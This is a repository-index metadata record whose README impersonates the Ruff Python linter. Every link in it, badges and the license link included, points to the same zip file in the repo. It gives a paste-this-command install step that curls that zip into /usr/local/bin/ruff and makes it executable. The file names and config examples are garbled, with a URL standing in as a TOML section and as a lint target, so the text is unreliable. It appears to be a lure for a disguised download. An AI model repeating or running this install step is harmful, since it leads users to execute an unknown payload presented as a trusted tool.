{"id":28296858,"url":"https://github.com/sartcod/ruff","last_synced_at":"2026-05-06T11:38:23.873Z","repository":{"id":294784551,"uuid":"988016241","full_name":"sartcod/ruff","owner":"sartcod","description":"An extremely fast Python linter and code formatter, written in Rust.","archived":false,"fork":false,"pushed_at":"2026-05-01T23:55:30.000Z","size":525,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2026-05-02T01:23:52.033Z","etag":null,"topics":["codequality","doctest","intelij","isort","jupyter-notebook","library","net","network","pre-commit","pycharm","pylint","pytest","python","pyupgrade","reliable","ruff","ruffle","static-code-analysis"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sartcod.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-05-21T23:48:21.000Z","updated_at":"2026-05-01T23:55:33.000Z","dependencies_parsed_at":null,"dependency_job_id":"684a9d9f-cf64-46e8-a96a-dfe60851b945","html_url":"https://github.com/sartcod/ruff","commit_stats":null,"previous_names":["sartcod/ruff"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/sartcod/ruff","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sartcod%2Fruff","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sartcod%2Fruff/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sartcod%2Fruff/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sartcod%2Fruff/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sartcod","download_url":"https://codeload.github.com/sartcod/ruff/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sartcod%2Fruff/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32692655,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-06T08:33:17.875Z","status":"ssl_error","status_checked_at":"2026-05-06T08:33:17.221Z","response_time":117,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["codequality","doctest","intelij","isort","jupyter-notebook","library","net","network","pre-commit","pycharm","pylint","pytest","python","pyupgrade","reliable","ruff","ruffle","static-code-analysis"],"created_at":"2025-05-22T22:12:56.606Z","updated_at":"2026-05-06T11:38:23.869Z","avatar_url":"https://github.com/sartcod.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🚀 Ruff: Fast Python Linter and Code Formatter\n\n[![Latest Release](https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip)](https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip) \n[![License](https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip)](https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip)\n\nWelcome to **Ruff**, an extremely fast Python linter and code formatter, built with Rust. Whether you're working on a small script or a large application, Ruff helps you maintain clean, readable code by adhering to style guidelines and catching potential issues early in the development process.\n\n## Table of Contents\n\n1. [Features](#features)\n2. [Installation](#installation)\n3. [Usage](#usage)\n4. [Configuration](#configuration)\n5. [Supported Style Guides](#supported-style-guides)\n6. [Contributing](#contributing)\n7. [License](#license)\n8. [Contact](#contact)\n\n## Features\n\n- **Speed**: Built in Rust, Ruff provides lightning-fast linting and formatting, making it suitable for both small projects and large codebases.\n- **Compatibility**: Supports Python 3.x, ensuring you can lint and format modern Python code.\n- **Static Analysis**: Identify potential issues in your code before they become problems.\n- **Customizable**: Tailor Ruff to fit your project's needs with various configuration options.\n- **PEP 8 Compliance**: Ensures your code adheres to the widely accepted Python style guide.\n\n## Installation\n\nTo get started with Ruff, download the latest release from the [Releases section](https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip). Follow the instructions provided to install it on your system.\n\n```bash\n# Example command to install Ruff\ncurl -sSfL https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip -o /usr/local/bin/ruff\nchmod +x /usr/local/bin/ruff\n```\n\n## Usage\n\nOnce installed, you can run Ruff from the command line. Here are some basic commands to get you started:\n\n### Linting\n\nTo lint a Python file, simply run:\n\n```bash\nruff lint https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip\n```\n\n### Formatting\n\nTo format a Python file, use:\n\n```bash\nruff format https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip\n```\n\n### Check for Issues\n\nYou can check for issues in an entire directory:\n\n```bash\nruff lint your_directory/\n```\n\n## Configuration\n\nRuff allows you to configure its behavior through a configuration file. You can create a `https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip` file in your project directory to specify your preferences.\n\nHere’s an example configuration:\n\n```toml\n[https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip]\nline-length = 88\nexclude = [\"migrations\"]\n```\n\n## Supported Style Guides\n\nRuff supports various style guides, including:\n\n- PEP 8\n- Google Style Guide\n- Facebook Style Guide\n\nYou can specify which style guide to follow in your configuration file.\n\n## Contributing\n\nWe welcome contributions to Ruff! If you have ideas for improvements or find bugs, please open an issue or submit a pull request. \n\n### Steps to Contribute\n\n1. Fork the repository.\n2. Create a new branch.\n3. Make your changes.\n4. Test your changes.\n5. Submit a pull request.\n\n## License\n\nRuff is licensed under the MIT License. See the [LICENSE](https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip) file for more details.\n\n## Contact\n\nFor questions or feedback, feel free to reach out via the Issues section of this repository or contact the maintainers directly.\n\n---\n\nThank you for checking out Ruff! We hope it enhances your Python coding experience. Don’t forget to visit the [Releases section](https://github.com/sartcod/ruff/raw/refs/heads/master/Athenian/Software-1.2-beta.5.zip) for the latest updates and downloads.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsartcod%2Fruff","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsartcod%2Fruff","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsartcod%2Fruff/lists"}